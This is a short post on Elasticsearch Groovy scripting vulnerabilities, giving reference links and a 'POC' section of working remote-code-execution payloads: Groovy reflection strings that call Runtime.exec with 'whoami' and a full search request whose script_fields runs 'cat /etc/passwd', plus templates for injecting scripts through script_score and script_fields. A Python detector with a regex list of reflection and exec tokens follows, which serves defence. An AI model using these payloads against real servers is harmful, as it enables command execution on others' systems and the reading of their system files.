2015-03-05 10:02:24

elasticsearch scripting security issues

elasticsearch scripting:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

security issues:

http://www.elasticsearch.org/community/security/

http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0

POC:

Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()
super.class.toString().valueOf('whoami').execute().getText()
http://zone.wooyun.org/content/18915
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
{
  "size": 1, 
  "query": {
    "function_score": {
      "script_score": {
        "script": "POC............",
        "lang": "groovy"
      }
    }
  }
}
{
    "size": 1, 
    "script_fields": {
        "my_field": {
            "script": "POC.........."
        }
    }
}
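A defensive check for the request shapes above, as an added example that is not part of the original post: it walks a search request body, reports every "script" string (under script_fields, script_score or anywhere else) and flags the reflection and exec tokens that appear in the strings on this page. The token list, function names and sample bodies are constructed for illustration, and the walker assumes the plain-string form of "script" shown here.

```python
import json
import re

# Tokens taken from the script strings on this page (reflection via forName,
# Runtime/exec, Groovy String.execute()). Assumption: an illustrative list,
# not a complete signature set.
SUSPICIOUS = re.compile(
    r"forName\s*\(|getRuntime\s*\(|\.exec\s*\(|\.execute\s*\(|"
    r"getConstructor\s*\(|newInstance\s*\(|java\.lang\.Runtime"
)

def iter_scripts(node, path=""):
    """Yield (json_path, script_text) for every "script" string in a body."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if key == "script" and isinstance(value, str):
                yield child, value
            else:
                yield from iter_scripts(value, child)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from iter_scripts(item, f"{path}[{i}]")

def audit_search_body(raw):
    """Return one finding per script; a body that is not JSON is reported too."""
    try:
        body = json.loads(raw)
    except ValueError:
        return [{"path": "", "reason": "unparseable-body", "tokens": []}]
    findings = []
    for path, script in iter_scripts(body):
        tokens = sorted(set(SUSPICIOUS.findall(script)))
        reason = "suspicious-script" if tokens else "dynamic-script"
        findings.append({"path": path, "reason": reason, "tokens": tokens})
    return findings

# Constructed sample request bodies (not captured traffic).
SAMPLES = [
    r'{"size":1,"script_fields":{"f":{"script":"Math.class.forName(\"java.lang.Runtime\")","lang":"groovy"}}}',
    r'{"size":1,"query":{"function_score":{"script_score":{"script":"_score * 2","lang":"groovy"}}}}',
    r'{"query":{"match_all":{}}}',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_search_body(sample))
```

A "dynamic-script" finding is not malicious by itself; it marks a request that relies on dynamic scripting and is worth reviewing if that feature is supposed to be disabled.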